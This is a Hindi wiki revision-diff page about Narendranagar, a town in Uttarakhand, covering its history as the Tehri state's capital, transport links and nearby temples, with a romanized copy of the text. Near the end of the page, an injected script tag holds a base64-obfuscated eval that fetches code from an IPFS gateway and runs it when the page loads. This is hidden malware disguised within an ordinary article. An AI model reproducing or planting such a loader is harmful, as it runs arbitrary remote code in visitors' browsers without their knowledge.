Difference between revisions of "नरेन्द्रनगर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('<!-- सबसे पहले इस पन्ने को संजोएँ (सेव करें) जिससे आपको य...' के साथ नया पन्ना बनाया)
 
Line 3: Line 3:
 
{{पुनरीक्षण}}<!-- कृपया इस साँचे को हटाएँ नहीं (डिलीट न करें)। इसके नीचे से ही सम्पादन कार्य करें। -->
 
{{पुनरीक्षण}}<!-- कृपया इस साँचे को हटाएँ नहीं (डिलीट न करें)। इसके नीचे से ही सम्पादन कार्य करें। -->
 
'''आपको नया पन्ना बनाने के लिए यह आधार दिया गया है'''
 
'''आपको नया पन्ना बनाने के लिए यह आधार दिया गया है'''
 +
{{सूचना बक्सा पर्यटन
 +
|चित्र=Narendranagar.JPG
 +
|विवरण=प्रकृति की गोद में बसा उत्तराखण्ड का यह छोटा सा नगर स्वयं में बडा इतिहास समेटे है।
 +
|राज्य=[[उत्तराखण्ड]]
 +
|ज़िला=टिहरी गढवाल ज़िला
 +
|निर्माता=
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=
 +
|स्थापना=1903 में नरेन्द्र शाह द्वारा स्थापित
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=यह शहर सड़क द्वारा [[दिल्ली]] से 279 किमी तथा [[ऋषिकेश]] से 15 किमी दूरी पर स्थित है।
 +
|प्रसिद्धि=तत्कालीन टिहरी रियासत की राजधानी, कुंजापुरी मंदिर (सिद्धपीठ)
 +
|कब जाएँ=
 +
|यातायात=
 +
|हवाई अड्डा=जौली ग्रान्ट हवाई अड्डा, देहरादून
 +
|रेलवे स्टेशन=ऋषिकेश रेलवे स्टेशन
 +
|बस अड्डा=
 +
|कैसे पहुँचें=किसी भी शहर से बस और टैक्सी द्वारा पहुँचा जा सकता है।
 +
|क्या देखें=[[उत्तराखण्ड पर्यटन]]
 +
|कहाँ ठहरें=
 +
|क्या खायें=
 +
|क्या ख़रीदें=गहत स्थानीय दाल,
 +
|एस.टी.डी. कोड=0176
 +
|ए.टी.एम=   
 +
|सावधानी=बरसात में भूस्खलन
 +
|मानचित्र लिंक=[http://maps.google.co.in/maps?hl=en&sz=9&sll=28.991325,77.931519&q=Mussoorie,+Uttarakhand&ie=UTF8&hq=&hnear=Mussoorie,+Dehradun,+Uttarakhand&gl=in&ll=30.440386,78.024902&spn=0.542267,1.234589&z=10 गूगल मानचित्र], [http://maps.google.co.in/maps?f=d&source=s_d&saddr=Jolly+Grant+Airport+(DED),+Uttarakhand&daddr=The+Mall,+Mussoorie,+248179+(Park+Plaza+Sylverton+Mussoorie)&geocode=FTqqzAEdsd6oBCEZey73T_HQPw%3BFey20AEdvGGnBCGHrpwXIGx7Ow&gl=in&hl=en&mra=pd&mrcr=0&sll=30.451337,78.078976&sspn=0.067776,0.154324&ie=UTF8&ll=30.34088,78.202057&spn=0.54282,1.234589&z=10 हवाई अड्डा]
 +
|संबंधित लेख=
 +
|पाठ 1=
 +
|शीर्षक 1=
 +
|पाठ 2=
 +
|शीर्षक 2=
 +
|अन्य जानकारी=नरेन्द्रनगर में आप ट्रेकिंग का भी आनन्द ले सकते हैं।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
  
[[चित्र:Narendranagar.JPG|thumb|250px|नरेन्द्रनगर की प्राकृतिक छटा ]]
+
[[चित्र:Tehri-Garhwal-Palace.jpg|thumb||left|250px|टिहरी रियायत राजा नरेन्द्र शाह का क़िला अब एक टूरिस्ट रिसांट है]]
उत्तराखण्ड का यह छोटा सा नगर स्वयं में बडा इतिहास समेटे है। उत्तराखण्ड के प्रमुख पर्यटक और तीर्थ स्थल ऋषिकेश से मात्र 15 किलोमीटर दूर स्थित यह छोटा सा पर्वतीय पर्यटक स्थल 1903 में चर्चा में आया जब तत्कालीन टिहरी रियासत के राज नरेन्द्र शाह ने इसे अपने राज्य की राजधानी प्रतापनगर से हटकर नरेन्द्रनगर में बनाने का फैसला किया।  
+
उत्तराखण्ड का यह छोटा सा नगर स्वयं में बडा इतिहास समेटे है। उत्तराखण्ड के प्रमुख पर्यटक और तीर्थ स्थल [[ऋषिकेश]] से मात्र 15 किलोमीटर दूर स्थित यह छोटा सा पर्वतीय पर्यटक स्थल 1903 में चर्चा में आया जब तत्कालीन टिहरी रियासत के राज नरेन्द्र शाह ने इसे अपने राज्य की राजधानी प्रतापनगर से हटकर नरेन्द्रनगर में बनाने का फैसला किया।  
 
==इतिहास==  
 
==इतिहास==  
[[चित्र:Tehri-Garhwal-Palace.jpg|thumb|250px|टिहरी रियायत राजा नरेन्द्र शाह का क़िला अब एक टूरिस्ट रिसांट है]]
 
 
टिहरी रियासत की जनता [[भारतीय स्वतंत्रता संग्राम]] के सामानान्तर टिहरी रियायत में भी राजशाही से मुक्ति के लिये संघर्षरत थी । तत्कालीन टिहरी रियासत की राजधानी [[प्रतानगर]] की तुलना में यह ब्रिटिश गढवाल (गढवाल रियासत का वह हिस्सा जो एक समझौते के तहत अंग्रजी शासन के अधीन था ) के रेल आदि आवगतन के अधिक सुविधाजनक स्थानो के समीप स्थित था। राज महल से एक किलोमीटर दूर राजभवन स्थापित किया गया जो भारतीय गणराज्य की स्वतंत्रता के उपरांत टिहरी रियासत को [[1947]]-[[1948]] में संयुक्त प्रांत में सम्मिलित होने पर पचास से अधिक वर्षो तका संयुक्त प्रान्त के पचासवें जनपद टिहरी गढवाल के जिला मुख्यालय के रूप में उपयोग किया गया। कालान्तर में जनपद टिहरी गढवाल की राजधानी टिहरी बांध के निर्माण के फलस्वरूप विस्थापन के उद्देश्य से बनाये गये नये टिहरी शहर न्यू टिहरी स्थानान्तरित हुयी। टिहरी रियासत के कार्मिकों के लिये नियोजित रूप से बनाये गये खूबसूरत भवनों की श्रंखला वर्तमान में इस छोटे नगर के मुख्य बाजार के रूप में उपयोग हो रहे हैं।  
 
टिहरी रियासत की जनता [[भारतीय स्वतंत्रता संग्राम]] के सामानान्तर टिहरी रियायत में भी राजशाही से मुक्ति के लिये संघर्षरत थी । तत्कालीन टिहरी रियासत की राजधानी [[प्रतानगर]] की तुलना में यह ब्रिटिश गढवाल (गढवाल रियासत का वह हिस्सा जो एक समझौते के तहत अंग्रजी शासन के अधीन था ) के रेल आदि आवगतन के अधिक सुविधाजनक स्थानो के समीप स्थित था। राज महल से एक किलोमीटर दूर राजभवन स्थापित किया गया जो भारतीय गणराज्य की स्वतंत्रता के उपरांत टिहरी रियासत को [[1947]]-[[1948]] में संयुक्त प्रांत में सम्मिलित होने पर पचास से अधिक वर्षो तका संयुक्त प्रान्त के पचासवें जनपद टिहरी गढवाल के जिला मुख्यालय के रूप में उपयोग किया गया। कालान्तर में जनपद टिहरी गढवाल की राजधानी टिहरी बांध के निर्माण के फलस्वरूप विस्थापन के उद्देश्य से बनाये गये नये टिहरी शहर न्यू टिहरी स्थानान्तरित हुयी। टिहरी रियासत के कार्मिकों के लिये नियोजित रूप से बनाये गये खूबसूरत भवनों की श्रंखला वर्तमान में इस छोटे नगर के मुख्य बाजार के रूप में उपयोग हो रहे हैं।  
 +
==यातायात व परिवहन==
 +
====वायुमार्ग====
 +
नरेन्द्रनगर से 33 किलोमिटर की दूरी पर [[देहरादून]] के निकट जौली ग्रान्ट एयरपोर्ट नज़दीकी एयरपोर्ट है। इंडियन एयरलाइन्स की फ्लाइटें इस एयरपोर्ट को [[दिल्ली]] से जोड़ती है।
 +
====रेलमार्ग====
 +
नरेन्द्रनगर का नज़दीकी रेलवे स्टेशन [[ऋषिकेश]] है जो 15 किलोमिटर दूर है। ऋषिकेश का नज़दीकी रेलवे स्टेशन [[हरिद्वार]] है जो 25 किलोमिटर दूर है। हरिद्वार देश के प्रमुख रेलवे स्टेशनों से जुड़ा हुआ है।
 +
====सड़क मार्ग====
 +
[[दिल्ली]] के कश्मीरी गेट से ऋषिकेश के लिए डीलक्स और निजी बसों की व्यवस्था है। राज्य परिवहन निगम की बसें नियमित रूप से दिल्ली और उत्तराखंड के अनेक शहरों से ऋषिकेश के लिए चलती हैं।
 +
==पर्यटन==
 +
{{main|ऋषिकेश पर्यटन}}
 +
पर्यटकों के आकर्षण के लिए यहाँ बहुत कुछ है। नरेन्द्रनगर के समीपवर्ती पर्यटक स्थल [[कुंजापुरी मंदिर (सिद्धपीठ)]],और [[नंदी बैल मंदिर]] आदि  हैं।
 +
 +
==वीथिका==
 +
[[चित्र:Narendranagar.JPG|thumb|200px|center|नरेन्द्रनगर की प्राकृतिक छटा ]]
 +
<gallery>
 +
चित्र:Triveni-Ghat.jpg|[[त्रिवेणी घाट ऋषिकेश|त्रिवेणी घाट]], ऋषिकेश
 +
चित्र:Rishikesh-Ganga.jpg|ऋषिकेश से बहती [[गंगा नदी]]
 +
</gallery>
 +
==संबंधित लेख==
 +
{{उत्तराखंड के पर्यटन स्थल}}
 +
[[Category:उत्तराखंड]]
 +
[[Category:पर्यटन कोश]]
 +
[[Category:उत्तराखंड के पर्यटन स्थल]]
 +
[[Category:धार्मिक स्थल कोश]]
 +
[[Category:हिन्दू धार्मिक स्थल]]
  
  
== समीपवर्ती पर्यटक स्थल==
 
कुंजापुरी मंदिर (सिद्धपीठ),  नंदी बैल मंदिर आदि
 
 
==शीर्षक उदाहरण 1==
 
==शीर्षक उदाहरण 1==
  

Revision as of 05:00, 19 September 2012

thumb|narendranagar liank par klik karake chitr apalod karean

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

apako naya panna banane ke lie yah adhar diya gaya hai

narendranagar
vivaran prakriti ki god mean basa uttarakhand ka yah chhota sa nagar svayan mean bada itihas samete hai.
rajy uttarakhand
zila tihari gadhaval zila
sthapana 1903 mean narendr shah dvara sthapit
marg sthiti yah shahar s dak dvara dilli se 279 kimi tatha rrishikesh se 15 kimi doori par sthit hai.
prasiddhi tatkalin tihari riyasat ki rajadhani, kuanjapuri mandir (siddhapith)
kaise pahuanchean kisi bhi shahar se bas aur taiksi dvara pahuancha ja sakata hai.
havaee adda jauli grant havaee adda, deharadoon
relave steshan rrishikesh relave steshan
kya dekhean uttarakhand paryatan
kya kharidean gahat sthaniy dal,
es.ti.di. kod 0176
savadhani barasat mean bhooskhalan
chitr:Map-icon.gif googal manachitr, havaee adda
any janakari narendranagar mean ap trekiang ka bhi anand le sakate haian.

thumb||left|250px|tihari riyayat raja narendr shah ka qila ab ek toorist risaant hai uttarakhand ka yah chhota sa nagar svayan mean bada itihas samete hai. uttarakhand ke pramukh paryatak aur tirth sthal rrishikesh se matr 15 kilomitar door sthit yah chhota sa parvatiy paryatak sthal 1903 mean charcha mean aya jab tatkalin tihari riyasat ke raj narendr shah ne ise apane rajy ki rajadhani pratapanagar se hatakar narendranagar mean banane ka phaisala kiya.

itihas

tihari riyasat ki janata bharatiy svatantrata sangram ke samanantar tihari riyayat mean bhi rajashahi se mukti ke liye sangharsharat thi . tatkalin tihari riyasat ki rajadhani pratanagar ki tulana mean yah british gadhaval (gadhaval riyasat ka vah hissa jo ek samajhaute ke tahat aangraji shasan ke adhin tha ) ke rel adi avagatan ke adhik suvidhajanak sthano ke samip sthit tha. raj mahal se ek kilomitar door rajabhavan sthapit kiya gaya jo bharatiy ganarajy ki svatantrata ke uparaant tihari riyasat ko 1947-1948 mean sanyukt praant mean sammilit hone par pachas se adhik varsho taka sanyukt prant ke pachasavean janapad tihari gadhaval ke jila mukhyalay ke roop mean upayog kiya gaya. kalantar mean janapad tihari gadhaval ki rajadhani tihari baandh ke nirman ke phalasvaroop visthapan ke uddeshy se banaye gaye naye tihari shahar nyoo tihari sthanantarit huyi. tihari riyasat ke karmikoan ke liye niyojit roop se banaye gaye khoobasoorat bhavanoan ki shrankhala vartaman mean is chhote nagar ke mukhy bajar ke roop mean upayog ho rahe haian.

yatayat v parivahan

vayumarg

narendranagar se 33 kilomitar ki doori par deharadoon ke nikat jauli grant eyaraport nazadiki eyaraport hai. iandiyan eyaralains ki phlaitean is eyaraport ko dilli se jo dati hai.

relamarg

narendranagar ka nazadiki relave steshan rrishikesh hai jo 15 kilomitar door hai. rrishikesh ka nazadiki relave steshan haridvar hai jo 25 kilomitar door hai. haridvar desh ke pramukh relave steshanoan se ju da hua hai.

s dak marg

dilli ke kashmiri get se rrishikesh ke lie dilaks aur niji basoan ki vyavastha hai. rajy parivahan nigam ki basean niyamit roop se dilli aur uttarakhand ke anek shaharoan se rrishikesh ke lie chalati haian.

paryatan

  1. REDIRECTsaancha:mukhy

paryatakoan ke akarshan ke lie yahaan bahut kuchh hai. narendranagar ke samipavarti paryatak sthal kuanjapuri mandir (siddhapith),aur nandi bail mandir adi haian.

vithika

thumb|200px|center|narendranagar ki prakritik chhata

sanbandhit lekh


shirshak udaharan 1

shirshak udaharan 2

shirshak udaharan 3

shirshak udaharan 4
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh